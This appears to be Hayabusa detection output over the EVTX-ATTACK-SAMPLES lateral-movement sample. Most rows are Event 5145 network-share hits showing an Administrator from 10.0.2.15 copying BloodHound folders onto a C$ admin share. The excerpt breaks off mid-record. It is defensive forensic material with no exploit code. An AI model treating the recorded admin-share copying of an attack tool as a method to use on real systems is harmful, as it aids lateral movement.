0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.119 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.119 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.139 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.149 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.149 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.159 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.159 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.169 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.169 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.179 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.179 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.179 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.189 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.189 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.199 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.209 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.209 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.209 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.229 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.229 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.229 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.289 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.299 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 